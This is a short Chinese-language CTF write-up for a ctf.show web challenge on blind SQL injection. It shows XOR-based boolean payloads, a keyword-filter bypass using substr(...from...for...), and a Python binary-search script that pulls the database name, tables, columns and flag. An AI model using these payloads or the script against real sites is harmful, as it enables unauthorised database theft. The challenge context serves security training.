输入1^1^1:
输入1^0^1:
参数处过滤了limit
、+
、单引号
、逗号
、ascii
等关键字,因此考虑使用substr((database())from({})for(1))
的形式去绕过。
id=1^(ord(substr((database())from(1)for(1)))>23)^1
正常回显(1^1^1),说明数据库名的第一个字符的ascii码大于23。
id=1^(ord(substr((database())from(1)for(1)))>123)^1
无回显(1^0^1),说明数据库名的第一个字符的ascii码小于123。
尝试二分法盲注,脚本如下:
import requests url = ' http://2f7bbe27-e7d3-4b53-848f-77366c18e51b.chall.ctf.show/index.php?id=1' flag = '' for i in range(1, 50): high = 127 low = 32 mid = (high+low)//2 while high > low: payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid) # payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i,mid) # payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i,mid) # payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i,mid) s = requests.get(url=url+payload) if 'Rudyard' in s.text: low = mid+1 else: high = mid mid = (high+low)//2 flag += chr(mid) print(flag)